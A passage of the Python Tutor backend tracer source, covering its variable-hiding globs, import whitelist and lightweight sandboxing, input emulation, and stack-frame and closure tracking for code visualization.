colon. *hide* those variables in da trace\n#\n# 2018-06-17:\n# - now supports unix-style shell globs using the syntax in\n# https://docs.python.org/3/library/fnmatch.html so you can write things\n# like '#pythontutor_hide: _*' to hide all private instance variables\n# - also now filters class and instance fields in addition to top-level vars\nPYTUTOR_HIDE_STR = '#pythontutor_hide:'\n# 2018-06-17: a comma-separated list of types that should be displayed *inline*\n# like primitives, with their actual values HIDDEN to save space. for details\n# of what types are legal to specify, see:\n# pg_encoder.py:should_inline_object_by_type()\n# - also accepts shell globs, just like PYTUTOR_HIDE_STR\nPYTUTOR_INLINE_TYPE_STR = '#pythontutor_hide_type:'\n\nCLASS_RE = re.compile('class\\s+')\n\n# copied-pasted from translate() in https://github.com/python/cpython/blob/2.7/Lib/fnmatch.py\ndef globToRegex(pat):\n \"\"\"Translate a shell PATTERN to a regular expression.\n There is no way to quote meta-characters.\n \"\"\"\n\n i, n = 0, len(pat)\n res = ''\n while i < n:\n c = pat[i]\n i = i+1\n if c == '*':\n res = res + '.*'\n elif c == '?':\n res = res + '.'\n elif c == '[':\n j = i\n if j < n and pat[j] == '!':\n j = j+1\n if j < n and pat[j] == ']':\n j = j+1\n while j < n and pat[j] != ']':\n j = j+1\n if j >= n:\n res = res + '\\\\['\n else:\n stuff = pat[i:j].replace('\\\\','\\\\\\\\')\n i = j+1\n if stuff[0] == '!':\n stuff = '^' + stuff[1:]\n elif stuff[0] == '^':\n stuff = '\\\\' + stuff\n res = '%s[%s]' % (res, stuff)\n else:\n res = res + re.escape(c)\n return res + '\\Z(?ms)'\n\ndef compileGlobMatch(pattern):\n # very important to use match and *not* search!\n return re.compile(globToRegex(pattern)).match\n\n# test globToRegex and compileGlobMatch\n'''\nfor e in ('_*', '__*', '__*__', '*_$'):\n stuff = compileGlobMatch(e)\n for s in ('_test', 'test_', '_test_', '__test', '__test__'):\n print(e, s, stuff(s) is not None)\n'''\n\n\nTRY_ANACONDA_STR = '\\n\\nYou can also try \"Python 3.6 with Anaconda (experimental)\",\\nwhich is slower but lets you import many more modules.\\n'\n\n\n# simple sandboxing scheme:\n#\n# - use resource.setrlimit to deprive this process of ANY file descriptors\n# (which will cause file read/write and subprocess shell launches to fail)\n# - restrict user builtins and module imports\n# (beware that this is NOT foolproof at all ... there are known flaws!)\n#\n# ALWAYS use defense-in-depth and don't just rely on these simple mechanisms\ntry:\n import resource\n resource_module_loaded = True\nexcept ImportError:\n # Google App Engine doesn't seem to have the 'resource' module\n resource_module_loaded = False\n\n\n# From http://coreygoldberg.blogspot.com/2009/05/python-redirect-or-turn-off-stdout-and.html\nclass NullDevice():\n def write(self, s):\n pass\n\n\n# ugh, I can't figure out why in Python 2, __builtins__ seems to\n# be a dict, but in Python 3, __builtins__ seems to be a module,\n# so just handle both cases ... UGLY!\nif type(__builtins__) is dict:\n BUILTIN_IMPORT = __builtins__['__import__']\nelse:\n assert type(__builtins__) is types.ModuleType\n BUILTIN_IMPORT = __builtins__.__import__\n\n\n# whitelist of module imports\nALLOWED_STDLIB_MODULE_IMPORTS = ('math', 'random', 'time', 'datetime',\n 'functools', 'itertools', 'operator', 'string',\n 'collections', 're', 'json',\n 'heapq', 'bisect', 'copy', 'hashlib', 'typing',\n # the above modules were first added in 2012-09\n # and then incrementally appended to up until\n # 2016-ish (see git blame logs)\n\n # added these additional ones on 2018-06-15\n # after seeing usage logs of what users tried\n # importing a lot but we didn't support yet\n # (ignoring imports that heavily deal with\n # filesystem, networking, or 3rd-party libs)\n '__future__', 'cmath', 'decimal', 'fractions',\n 'pprint', 'calendar', 'pickle',\n 'types', 'array',\n 'locale', 'abc',\n 'doctest', 'unittest',\n )\n\n# allow users to import but don't explicitly import it since it's\n# already been done above\nOTHER_STDLIB_WHITELIST = ('StringIO', 'io')\n\n\n# Restrict imports to a whitelist\ndef __restricted_import__(*args):\n # filter args to ONLY take in real strings so that someone can't\n # subclass str and bypass the 'in' test on the next line\n args = [e for e in args if type(e) is str]\n\n all_allowed_imports = sorted(ALLOWED_STDLIB_MODULE_IMPORTS + OTHER_STDLIB_WHITELIST)\n if is_python3:\n all_allowed_imports.remove('StringIO')\n else:\n all_allowed_imports.remove('typing')\n\n if args[0] in all_allowed_imports:\n imported_mod = BUILTIN_IMPORT(*args)\n # somewhat weak protection against imported modules that contain one\n # of these troublesome builtins. again, NOTHING is foolproof ...\n # just more defense in depth :)\n #\n # unload it so that if someone attempts to reload it, then it has to be\n # loaded from the filesystem, which is (supposedly!) blocked by setrlimit\n for mod in ('os', 'sys', 'posix', 'gc'):\n if hasattr(imported_mod, mod):\n delattr(imported_mod, mod)\n\n return imported_mod\n else:\n # original error message ...\n #raise ImportError('{0} not supported'.format(args[0]))\n\n # 2017-12-06: added a better error message to tell the user what\n # modules *can* be imported in python tutor ...\n ENTRIES_PER_LINE = 6\n\n lines_to_print = []\n # adapted from https://stackoverflow.com/questions/312443/how-do-you-split-a-list-into-evenly-sized-chunks\n for i in range(0, len(all_allowed_imports), ENTRIES_PER_LINE):\n lines_to_print.append(all_allowed_imports[i:i + ENTRIES_PER_LINE])\n pretty_printed_imports = ',\\n '.join([', '.join(e) for e in lines_to_print])\n\n raise ImportError('{0} not found or not supported\\nOnly these modules can be imported:\\n {1}{2}'.format(args[0], pretty_printed_imports, TRY_ANACONDA_STR))\n\n\n# Support interactive user input by:\n#\n# 1. running the entire program up to a call to raw_input (or input in py3),\n# 2. bailing and returning a trace ending in a special 'raw_input' event,\n# 3. letting the web frontend issue a prompt to the user to grab a string,\n# 4. RE-RUNNING the whole program with that string added to input_string_queue,\n# 5. which should bring execution to the next raw_input call (if\n# available), or to termination.\n# Repeat until no more raw_input calls are encountered.\n# Note that this is mad inefficient, but is simple to implement!\n\n# VERY IMPORTANT -- set random seed to 0 to ensure deterministic execution:\nimport random\nrandom.seed(0)\n\n# queue of input strings passed from either raw_input or mouse_input\ninput_string_queue = []\n\n\ndef open_wrapper(*args):\n if is_python3:\n raise Exception('''open() is not supported by Python Tutor.\nInstead use io.StringIO() to simulate a file.\nExample: http://goo.gl/uNvBGl''' + TRY_ANACONDA_STR)\n else:\n raise Exception('''open() is not supported by Python Tutor.\nInstead use StringIO.StringIO() to simulate a file.\nExample: http://goo.gl/Q9xQ4p''' + TRY_ANACONDA_STR)\n\n# create a more sensible error message for unsupported features\ndef create_banned_builtins_wrapper(fn_name):\n def err_func(*args):\n raise Exception(\"'\" + fn_name + \"' is not supported by Python Tutor.\" + TRY_ANACONDA_STR)\n return err_func\n\n\nclass RawInputException(Exception):\n pass\n\ndef raw_input_wrapper(prompt=''):\n if input_string_queue:\n input_str = input_string_queue.pop(0)\n\n # write the prompt and user input to stdout, to emulate what happens\n # at the terminal\n sys.stdout.write(str(prompt)) # always convert prompt into a string\n sys.stdout.write(input_str + \"\\n\") # newline to simulate the user hitting Enter\n return input_str\n raise RawInputException(str(prompt)) # always convert prompt into a string\n\n\n# Python 2 input() does eval(raw_input())\ndef python2_input_wrapper(prompt=''):\n if input_string_queue:\n input_str = input_string_queue.pop(0)\n\n # write the prompt and user input to stdout, to emulate what happens\n # at the terminal\n sys.stdout.write(str(prompt)) # always convert prompt into a string\n sys.stdout.write(input_str + \"\\n\") # newline to simulate the user hitting Enter\n return eval(input_str) # remember to eval!\n raise RawInputException(str(prompt)) # always convert prompt into a string\n\nclass MouseInputException(Exception):\n pass\n\ndef mouse_input_wrapper(prompt=''):\n if input_string_queue:\n return input_string_queue.pop(0)\n raise MouseInputException(prompt)\n\n\n# blacklist of builtins\nBANNED_BUILTINS = [] # 2018-06-15 don't ban any builtins since that's just security by obscurity\n # we should rely on other layered security mechanisms\n\n# old banned built-ins prior to 2018-06-15\n#BANNED_BUILTINS = ['reload', 'open', 'compile',\n# 'file', 'eval', 'exec', 'execfile',\n# 'exit', 'quit', 'help',\n# 'dir', 'globals', 'locals', 'vars']\n# Peter says 'apply' isn't dangerous, so don't ban it\n\nIGNORE_VARS = set(('__builtins__', '__name__', '__exception__', '__doc__', '__package__'))\n\n\n'''\n2013-12-26\n\nOkay, what's with this f_valuestack business?\n\nIf you compile your own CPython and patch Objects/frameobject.c to add a\nPython accessor for f_valuestack, then you can actually access the value\nstack, which is useful for, say, grabbbing the objects within\nlist/set/dict comprehensions as they're being built. e.g., try:\n\n z = [x*y for x in range(5) for y in range(5)]\n\nNote that on pythontutor.com, I am currently running custom-compiled\nversions of Python-2.7.6 and Python-3.3.3 with this f_valuestack hack.\nUnless you run your own custom CPython, you won't get these benefits.\n- update as of 2018-06-16: I don't think the above has been true for a while\n\n\nPatch:\n\n static PyObject *\n frame_getlineno(PyFrameObject *f, void *closure)\n {\n return PyLong_FromLong(PyFrame_GetLineNumber(f));\n }\n\n+// copied from Py2crazy, which was for Python 2, but let's hope this still works!\n+static PyObject *\n+frame_getvaluestack(PyFrameObject* f) {\n+ // pgbovine - TODO: will this memory leak? hopefully not,\n+ // since all other accessors seem to follow the same idiom\n+ PyObject* lst = PyList_New(0);\n+ if (f->f_stacktop != NULL) {\n+ PyObject** p = NULL;\n+ for (p = f->f_valuestack; p < f->f_stacktop; p++) {\n+ PyList_Append(lst, *p);\n+ }\n+ }\n+\n+ return lst;\n+}\n+\n /* Setter for f_lineno - you can set f_lineno from within a trace function in\n * order to jump to a given line of code, subject to some restrictions. Most\n * lines are OK to jump to because they don't make any assumptions about the\n@@ -368,6 +384,11 @@\n\n static PyGetSetDef frame_getsetlist[] = {\n {\"f_locals\", (getter)frame_getlocals, NULL, NULL},\n {\"f_lineno\", (getter)frame_getlineno,\n (setter)frame_setlineno, NULL},\n {\"f_trace\", (getter)frame_gettrace, (setter)frame_settrace, NULL},\n+\n+ // pgbovine\n+ {\"f_valuestack\",(getter)frame_getvaluestack,\n+ (setter)NULL /* don't let it be set */, NULL},\n+\n {0}\n };\n'''\n\n# at_global_scope should be true only if 'frame' represents the global scope\ndef get_user_globals(frame, at_global_scope=False):\n d = filter_var_dict(frame.f_globals)\n\n # don't blurt out all of f_valuestack for now ...\n '''\n if at_global_scope and hasattr(frame, 'f_valuestack'):\n for (i, e) in enumerate(frame.f_valuestack):\n d['_tmp' + str(i+1)] = e\n '''\n\n # print out list objects being built up in Python 2.x list comprehensions\n # (which don't have its own special frame, sadly)\n if not is_python3 and hasattr(frame, 'f_valuestack'):\n for (i, e) in enumerate([e for e in frame.f_valuestack if type(e) is list]):\n d['_tmp' + str(i+1)] = e\n\n # also filter out __return__ for globals only, but NOT for locals\n if '__return__' in d:\n del d['__return__']\n return d\n\ndef get_user_locals(frame):\n ret = filter_var_dict(frame.f_locals)\n # don't blurt out all of f_valuestack for now ...\n '''\n if hasattr(frame, 'f_valuestack'):\n for (i, e) in enumerate(frame.f_valuestack):\n ret['_tmp' + str(i+1)] = e\n '''\n\n # special printing of list/set/dict comprehension objects as they are\n # being built up incrementally ...\n f_name = frame.f_code.co_name\n if hasattr(frame, 'f_valuestack'):\n # print out list objects being built up in Python 2.x list comprehensions\n # (which don't have its own special frame, sadly)\n if not is_python3:\n for (i, e) in enumerate([e for e in frame.f_valuestack\n if type(e) is list]):\n ret['_tmp' + str(i+1)] = e\n\n # for dict and set comprehensions, which have their own frames:\n if f_name.endswith('comp>'):\n for (i, e) in enumerate([e for e in frame.f_valuestack\n if type(e) in (list, set, dict)]):\n ret['_tmp' + str(i+1)] = e\n\n return ret\n\ndef filter_var_dict(d):\n ret = {}\n for (k,v) in d.items():\n if k not in IGNORE_VARS:\n ret[k] = v\n return ret\n\n\n# yield all function objects locally-reachable from frame,\n# making sure to traverse inside all compound objects ...\ndef visit_all_locally_reachable_function_objs(frame):\n for (k, v) in get_user_locals(frame).items():\n for e in visit_function_obj(v, set()):\n if e: # only non-null if it's a function object\n assert type(e) in (types.FunctionType, types.MethodType)\n yield e\n\n\n# TODO: this might be slow if we're traversing inside lots of objects:\ndef visit_function_obj(v, ids_seen_set):\n v_id = id(v)\n\n # to prevent infinite loop\n if v_id in ids_seen_set:\n yield None\n else:\n ids_seen_set.add(v_id)\n\n typ = type(v)\n \n # simple base case\n if typ in (types.FunctionType, types.MethodType):\n yield v\n\n # recursive cases\n elif typ in (list, tuple, set):\n for child in v:\n for child_res in visit_function_obj(child, ids_seen_set):\n yield child_res\n\n elif typ == dict or pg_encoder.is_class(v) or pg_encoder.is_instance(v):\n contents_dict = None\n\n if typ == dict:\n contents_dict = v\n # warning: some classes or instances don't have __dict__ attributes\n elif hasattr(v, '__dict__'):\n contents_dict = v.__dict__\n\n if contents_dict:\n for (key_child, val_child) in contents_dict.items():\n for key_child_res in visit_function_obj(key_child, ids_seen_set):\n yield key_child_res\n for val_child_res in visit_function_obj(val_child, ids_seen_set):\n yield val_child_res\n\n # degenerate base case\n yield None\n\n\nclass PGLogger(bdb.Bdb):\n # if custom_modules is non-empty, it should be a dict mapping module\n # names to the python source code of each module. when _runscript is\n # called, it will do \"from import *\" for all modules in\n # custom_modules before running the user's script and then trace all\n # code within custom_modules\n #\n # if separate_stdout_by_module, then have a separate stdout stream\n # for each module rather than all stdout going to a single stream\n def __init__(self, cumulative_mode, heap_primitives, show_only_outputs, finalizer_func,\n disable_security_checks=False, allow_all_modules=False, crazy_mode=False,\n custom_modules=None, separate_stdout_by_module=False, probe_exprs=None):\n bdb.Bdb.__init__(self)\n self.mainpyfile = ''\n self._wait_for_mainpyfile = 0\n\n if probe_exprs:\n self.probe_exprs = probe_exprs\n else:\n self.probe_exprs = None\n\n self.separate_stdout_by_module = separate_stdout_by_module\n self.stdout_by_module = {} # Key: module name, Value: StringIO faux-stdout\n\n self.modules_to_trace = set(['__main__']) # always trace __main__!\n\n # Key: module name\n # Value: module's python code as a string\n self.custom_modules = custom_modules\n if self.custom_modules:\n for module_name in self.custom_modules:\n self.modules_to_trace.add(module_name)\n\n self.disable_security_checks = disable_security_checks\n self.allow_all_modules = allow_all_modules\n # if we allow all modules, we shouldn't do security checks\n # either since otherwise users can't really import anything\n # because that will likely involve opening files on disk, which\n # is disallowed by security checks\n if self.allow_all_modules:\n self.disable_security_checks = True\n\n # if True, then displays ALL stack frames that have ever existed\n # rather than only those currently on the stack (and their\n # lexical parents)\n self.cumulative_mode = cumulative_mode\n\n # if True, then render certain primitive objects as heap objects\n self.render_heap_primitives = heap_primitives\n\n # if True, then don't render any data structures in the trace,\n # and show only outputs\n self.show_only_outputs = show_only_outputs\n\n # Run using the custom Py2crazy Python interpreter\n self.crazy_mode = crazy_mode\n\n # a function that takes the output trace as a parameter and\n # processes it\n self.finalizer_func = finalizer_func\n\n # each entry contains a dict with the information for a single\n # executed line\n self.trace = []\n\n # if this is true, don't put any more stuff into self.trace\n self.done = False\n\n # if this is non-null, don't do any more tracing until a\n # 'return' instruction with a stack gotten from\n # get_stack_code_IDs() that matches wait_for_return_stack\n self.wait_for_return_stack = None\n\n #http://stackoverflow.com/questions/2112396/in-python-in-google-app-engine-how-do-you-capture-output-produced-by-the-print\n self.GAE_STDOUT = sys.stdout\n\n # Key: function object\n # Value: parent frame\n self.closures = {}\n\n # Key: code object for a lambda\n # Value: parent frame\n self.lambda_closures = {}\n\n # set of function objects that were defined in the global scope\n self.globally_defined_funcs = set()\n\n # Key: frame object\n # Value: monotonically increasing small ID, based on call order\n self.frame_ordered_ids = {}\n self.cur_frame_id = 1\n\n # List of frames to KEEP AROUND after the function exits.\n # If cumulative_mode is True, then keep ALL frames in\n # zombie_frames; otherwise keep only frames where\n # nested functions were defined within them.\n self.zombie_frames = []\n\n # set of elements within zombie_frames that are also\n # LEXICAL PARENTS of other frames\n self.parent_frames_set = set()\n\n # all globals that ever appeared in the program, in the order in\n # which they appeared. note that this might be a superset of all\n # the globals that exist at any particular execution point,\n # since globals might have been deleted (using, say, 'del')\n self.all_globals_in_order = []\n\n # very important for this single object to persist throughout\n # execution, or else canonical small IDs won't be consistent.\n self.encoder = pg_encoder.ObjectEncoder(self)\n\n self.executed_script = None # Python script to be executed!\n\n # if there is at least one line that ends with BREAKPOINT_STR,\n # then activate \"breakpoint mode\", where execution should stop\n # ONLY at breakpoint lines.\n self.breakpoints = []\n\n self.vars_to_hide = set() # a set of regex match objects\n # created by compileGlobMatch() from\n # the contents of PYTUTOR_HIDE_STR\n self.types_to_inline = set() # a set of regex match objects derived from PYTUTOR_INLINE_TYPE_STR\n\n self.prev_lineno = -1 # keep track of previous line just executed\n\n\n def should_hide_var(self, var):\n for re_match in self.vars_to_hide:\n if re_match(var):\n return True\n return False\n\n\n def get_user_stdout(self):\n def encode_stringio(sio):\n # This is SUPER KRAZY! In Python 2, the buflist inside of a StringIO\n # instance can be made up of both str and unicode, so we need to convert\n # the str to unicode and replace invalid characters with the Unicode '?'\n # But leave unicode elements alone. This way, EVERYTHING inside buflist\n # will be unicode. (Note that in Python 3, everything is already unicode,\n # so we're fine.)\n if not is_python3:\n sio.buflist = [(e.decode('utf-8', 'replace')\n if type(e) is str\n else e)\n for e in sio.buflist]\n return sio.getvalue()\n\n if self.separate_stdout_by_module:\n ret = {}\n for module_name in self.stdout_by_module:\n ret[module_name] = encode_stringio(self.stdout_by_module[module_name])\n return ret\n else:\n # common case - single stdout stream\n return encode_stringio(self.user_stdout)\n\n\n def get_frame_id(self, cur_frame):\n return self.frame_ordered_ids[cur_frame]\n\n # Returns the (lexical) parent of a function value.\n def get_parent_of_function(self, val):\n if val in self.closures:\n return self.get_frame_id(self.closures[val])\n elif val in self.lambda_closures:\n return self.get_frame_id(self.lambda_closures[val])\n else:\n return None\n\n\n # Returns the (lexical) parent frame of the function that was called\n # to create the stack frame 'frame'.\n #\n # OKAY, this is a SUPER hack, but I don't see a way around it\n # since it's impossible to tell exactly which function\n # ('closure') object was called to create 'frame'.\n #\n # The Python interpreter doesn't maintain this information,\n # so unless we hack the interpreter, we will simply have\n # to make an educated guess based on the contents of local\n # variables inherited from possible parent frame candidates.\n def get_parent_frame(self, frame):\n #print >> sys.stderr, 'get_parent_frame: frame.f_code', frame.f_code\n for (func_obj, parent_frame) in self.closures.items():\n # ok, there's a possible match, but let's compare the\n # local variables in parent_frame to those of frame\n # to make sure. this is a hack that happens to work because in\n # Python, each stack frame inherits ('inlines') a copy of the\n # variables from its (lexical) parent frame.\n if func_obj.__code__ == frame.f_code:\n all_matched = True\n for k in frame.f_locals:\n # Do not try to match local names\n if k in frame.f_code.co_varnames:\n continue\n if k != '__return__' and k in parent_frame.f_locals:\n if parent_frame.f_locals[k] != frame.f_locals[k]:\n all_matched = False\n break\n\n if all_matched:\n return parent_frame\n\n for (lambda_code_obj, parent_frame) in self.lambda_closures.items():\n if lambda_code_obj == frame.f_code:\n # TODO: should we do more verification like above?!?\n return parent_frame\n\n return None\n\n\n def lookup_zombie_frame_by_id(self, frame_id):\n # TODO: kinda inefficient\n for e in self.zombie_frames:\n if self.get_frame_id(e) == frame_id:\n return e\n assert False # should never get here\n\n\n # unused ...\n #def reset(self):\n # bdb.Bdb.reset(self)\n # self.forget()\n\n\n def forget(self):\n self.lineno = None\n self.stack = []\n self.curindex = 0\n self.curframe = None\n\n def setup(self, f, t):\n self.forget()\n self.stack, self.curindex = self.get_stack(f, t)\n self.curframe = self.stack[self.curindex][0]\n\n # should be a reasonably unique ID to match calls and returns:\n def get_stack_code_IDs(self):\n return [id(e[0].f_code) for e in self.stack]\n\n\n # Override Bdb methods\n\n def user_call(self, frame, argument_list):\n \"\"\"This method is called when there is the remote possibility\n that we ever need to stop in this function.\"\"\"\n # TODO: figure out a way to move this down to 'def interaction'\n # or right before self.trace.append ...\n if self.done: return\n\n if self._wait_for_mainpyfile:\n return\n if self.stop_here(frame):\n # delete __return__ so that on subsequent calls to\n # a generator function, the OLD yielded (returned)\n # value gets deleted from the frame ...\n try:\n del frame.f_locals['__return__']\n except KeyError:\n pass\n\n self.interaction(frame, None, 'call')\n\n def user_line(self, frame):\n \"\"\"This function is called when we stop or break at this line.\"\"\"\n if self.done: return\n\n if self._wait_for_mainpyfile:\n if ((frame.f_globals['__name__'] not in self.modules_to_trace) or\n frame.f_lineno <= 0):\n # older code:\n #if (self.canonic(frame.f_code.co_filename) != \"\" or\n # frame.f_lineno <= 0):\n return\n self._wait_for_mainpyfile = 0\n self.interaction(frame, None, 'step_line')\n\n def user_return(self, frame, return_value):\n \"\"\"This function is called when a return trap is set here.\"\"\"\n if self.done: return\n\n frame.f_locals['__return__'] = return_value\n self.interaction(frame, None, 'return')\n\n def user_exception(self, frame, exc_info):\n \"\"\"This function is called if an exception occurs,\n but only if we are to stop at or just below this level.\"\"\"\n if self.done: return\n\n exc_type, exc_value, exc_traceback = exc_info\n frame.f_locals['__exception__'] = exc_type, exc_value\n if type(exc_type) == type(''):\n exc_type_name = exc_type\n else: exc_type_name = exc_type.__name__\n\n if exc_type_name == 'RawInputException':\n raw_input_arg = str(exc_value.args[0]) # make sure it's a string so it's JSON serializable!\n self.trace.append(dict(event='raw_input', prompt=raw_input_arg))\n self.done = True\n elif exc_type_name == 'MouseInputException':\n mouse_input_arg = str(exc_value.args[0]) # make sure it's a string so it's JSON serializable!\n self.trace.append(dict(event='mouse_input', prompt=mouse_input_arg))\n self.done = True\n else:\n self.interaction(frame, exc_traceback, 'exception')\n\n def get_script_line(self, n):\n return self.executed_script_lines[n-1]\n\n # General interaction function\n\n def interaction(self, frame, traceback, event_type):\n self.setup(frame, traceback)\n tos = self.stack[self.curindex]\n top_frame = tos[0]\n lineno = tos[1]\n\n topframe_module = top_frame.f_globals['__name__']\n\n # debug ...\n '''\n print >> sys.stderr\n print >> sys.stderr, '=== STACK ===', 'curindex:', self.curindex\n for (e,ln) in self.stack:\n print >> sys.stderr, e.f_code.co_name + ' ' + e.f_code.co_filename + ' ' + str(ln)\n print >> sys.stderr, \"top_frame\", top_frame.f_code.co_name, top_frame.f_code\n '''\n\n\n # don't trace inside of ANY functions that aren't user-written code\n # (e.g., those from imported modules -- e.g., random, re -- or the\n # __restricted_import__ function in this file)\n #\n # empirically, it seems like the FIRST entry in self.stack is\n # the 'run' function from bdb.py, but everything else on the\n # stack is the user program's \"real stack\"\n\n # Look only at the \"topmost\" frame on the stack ...\n\n # if we're not in a module that we are explicitly tracing, skip:\n # (this comes up in tests/backend-tests/namedtuple.txt)\n if topframe_module not in self.modules_to_trace:\n return\n # also don't trace inside of the magic \"constructor\" code\n if top_frame.f_code.co_name == '__new__':\n return\n # or __repr__, which is often called when running print statements\n if top_frame.f_code.co_name == '__repr__':\n return\n\n # don't trace if wait_for_return_stack is non-null ...\n if self.wait_for_return_stack:\n if event_type == 'return' and \\\n (self.wait_for_return_stack == self.get_stack_code_IDs()):\n self.wait_for_return_stack = None # reset!\n return # always bail!\n else:\n # Skip all \"calls\" that are actually class definitions, since\n # those faux calls produce lots of ugly cruft in the trace.\n #\n # NB: Only trigger on calls to functions defined in\n # user-written code (i.e., co_filename == ''), but that\n # should already be ensured by the above check for whether we're\n # in user-written code.\n if event_type == 'call':\n first_lineno = top_frame.f_code.co_firstlineno\n if topframe_module == \"__main__\":\n func_line = self.get_script_line(first_lineno)\n elif topframe_module in self.custom_modules:\n module_code = self.custom_modules[topframe_module]\n module_code_lines = module_code.splitlines() # TODO: maybe pre-split lines?\n func_line = module_code_lines[first_lineno-1]\n else:\n # you're hosed\n func_line = ''\n #print >> sys.stderr, func_line\n\n if CLASS_RE.match(func_line.lstrip()): # ignore leading spaces\n self.wait_for_return_stack = self.get_stack_code_IDs()\n return\n\n\n self.encoder.reset_heap() # VERY VERY VERY IMPORTANT,\n # or else we won't properly capture heap object mutations in the trace!\n\n if event_type == 'call':\n # Don't be so strict about this assertion because it FAILS\n # when you're calling a generator (not for the first time),\n # since that frame has already previously been on the stack ...\n #assert top_frame not in self.frame_ordered_ids\n\n self.frame_ordered_ids[top_frame] = self.cur_frame_id\n self.cur_frame_id += 1\n\n if self.cumulative_mode:\n self.zombie_frames.append(top_frame)\n\n # kinda tricky to get the timing right -- basically, as soon as you\n # make a call, set sys.stdout to the stream for the appropriate\n # module, and as soon as you return, set sys.stdout to the\n # stream for your caller's module. we need to do this on the\n # return call since we want to immediately start picking up\n # prints to stdout *right after* this function returns\n if self.separate_stdout_by_module:\n if event_type == 'call':\n if topframe_module in self.stdout_by_module:\n sys.stdout = self.stdout_by_module[topframe_module]\n else:\n sys.stdout = self.stdout_by_module[\"\"]\n elif event_type == 'return' and self.curindex > 0:\n prev_tos = self.stack[self.curindex - 1]\n prev_topframe = prev_tos[0]\n prev_topframe_module = prev_topframe.f_globals['__name__']\n if prev_topframe_module in self.stdout_by_module:\n sys.stdout = self.stdout_by_module[prev_topframe_module]\n else:\n sys.stdout = self.stdout_by_module[\"\"]\n\n\n # only render zombie frames that are NO LONGER on the stack\n #\n # subtle: self.stack[:self.curindex+1] is the real stack, since\n # everything after self.curindex+1 is beyond the top of the\n # stack. this seems to be relevant only when there's an exception,\n # since the ENTIRE stack is preserved but self.curindex\n # starts decrementing as the exception bubbles up the stack.\n cur_stack_frames = [e[0] for e in self.stack[:self.curindex+1]]\n zombie_frames_to_render = [e for e in self.zombie_frames if e not in cur_stack_frames]\n\n\n # each element is a pair of (function name, ENCODED locals dict)\n encoded_stack_locals = []\n\n\n # returns a dict with keys: function name, frame id, id of parent frame, encoded_locals dict\n def create_encoded_stack_entry(cur_frame):\n #print >> sys.stderr, '- create_encoded_stack_entry', cur_frame, self.closures, self.lambda_closures\n ret = {}\n\n\n parent_frame_id_list = []\n\n f = cur_frame\n while True:\n p = self.get_parent_frame(f)\n if p:\n pid = self.get_frame_id(p)\n assert pid\n parent_frame_id_list.append(pid)\n f = p\n else:\n break\n\n\n cur_name = cur_frame.f_code.co_name\n\n if cur_name == '':\n cur_name = 'unnamed function'\n\n # augment lambdas with line number\n if cur_name == '':\n cur_name += pg_encoder.create_lambda_line_number(cur_frame.f_code,\n self.encoder.line_to_lambda_code)\n\n # encode in a JSON-friendly format now, in order to prevent ill\n # effects of aliasing later down the line ...\n encoded_locals = {}\n\n for (k, v) in get_user_locals(cur_frame).items():\n is_in_parent_frame = False\n\n # don't display locals that appear in your parents' stack frames,\n # since that's redundant\n for pid in parent_frame_id_list:\n parent_frame = self.lookup_zombie_frame_by_id(pid)\n if k in parent_frame.f_locals:\n # ignore __return__, which is never copied\n if k != '__return__':\n # these values SHOULD BE ALIASES\n # (don't do an 'is' check since it might not fire for primitives)\n if parent_frame.f_locals[k] == v:\n is_in_parent_frame = True\n\n if is_in_parent_frame and k not in cur_frame.f_code.co_varnames:\n continue\n\n # don't display some built-in locals ...\n if k == '__module__':\n continue\n\n if self.should_hide_var(k):\n continue\n\n encoded_val = self.encoder.encode(v, self.get_parent_of_function)\n encoded_locals[k] = encoded_val\n\n\n # order the variable names in a sensible way:\n\n # Let's start with co_varnames, since it (often) contains all\n # variables in this frame, some of which might not exist yet.\n ordered_varnames = []\n for e in cur_frame.f_code.co_varnames:\n if e in encoded_locals:\n ordered_varnames.append(e)\n\n # sometimes co_varnames doesn't contain all of the true local\n # variables: e.g., when executing a 'class' definition. in that\n # case, iterate over encoded_locals and push them onto the end\n # of ordered_varnames in alphabetical order\n for e in sorted(encoded_locals.keys()):\n if e != '__return__' and e not in ordered_varnames:\n ordered_varnames.append(e)\n\n # finally, put __return__ at the very end\n if '__return__' in encoded_locals:\n ordered_varnames.append('__return__')\n\n # doctor Python 3 initializer to look like a normal function (denero)\n if '__locals__' in encoded_locals:\n ordered_varnames.remove('__locals__')\n local = encoded_locals.pop('__locals__')\n if encoded_locals.get('__return__', True) is None:\n encoded_locals['__return__'] = local\n\n # crucial sanity checks!\n assert len(ordered_varnames) == len(encoded_locals)\n for e in ordered_varnames:\n assert e in encoded_locals\n\n return dict(func_name=cur_name,\n is_parent=(cur_frame in self.parent_frames_set),\n frame_id=self.get_frame_id(cur_frame),\n parent_frame_id_list=parent_frame_id_list,\n encoded_locals=encoded_locals,\n ordered_varnames=ordered_varnames)\n\n\n i = self.curindex\n\n # look for whether a nested function has been defined during\n # this particular call:\n if i > 1: # i == 1 implies that there's only a global scope visible\n for v in visit_all_locally_reachable_function_objs(top_frame):\n if (v not in self.closures and \\\n v not in self.globally_defined_funcs):\n\n # Look for the presence of the code object (v.func_code\n # for Python 2 or v.__code__ for Python 3) in the\n # constant pool (f_code.co_consts) of an enclosing\n # stack frame, and set that frame as your parent.\n #\n # This technique properly handles lambdas passed as\n # function parameters. e.g., this example:\n #\n # def foo(x):\n # bar(lambda y: x + y)\n # def bar(a):\n # print a(20)\n # foo(10)\n chosen_parent_frame = None\n # SUPER hacky but seems to work -- use reversed(self.stack)\n # because we want to traverse starting from the TOP of the stack\n # (most recent frame) and find the first frame containing\n # a constant code object that matches v.__code__ or v.func_code\n #\n # required for this example from Berkeley CS61a:\n #\n # def f(p, k):\n # def g():\n # print(k)\n # if k == 0:\n # f(g, 1)\n # f(None, 0)\n #\n # there are two calls to f, each of which defines a\n # closure g that should point to the respective frame.\n #\n # note that for the second call to f, the parent of the\n # g defined in there should be that frame, which is at\n # the TOP of the stack. this reversed() hack does the\n # right thing. note that if you don't traverse the stack\n # backwards, then you will mistakenly get the parent as\n # the FIRST f frame (bottom of the stack).\n for (my_frame, my_lineno) in reversed(self.stack):\n if chosen_parent_frame:\n break\n\n for frame_const in my_frame.f_code.co_consts:\n if frame_const is (v.__code__ if is_python3 else v.func_code):\n chosen_parent_frame = my_frame\n break\n\n # 2013-12-01 commented out this line so tests/backend-tests/papajohn-monster.txt\n # works without an assertion failure ...\n #assert chosen_parent_frame # I hope this always passes :0\n\n # this condition should be False for functions declared in global scope ...\n if chosen_parent_frame in self.frame_ordered_ids:\n self.closures[v] = chosen_parent_frame\n self.parent_frames_set.add(chosen_parent_frame) # unequivocally add to this set!!!\n if not chosen_parent_frame in self.zombie_frames:\n 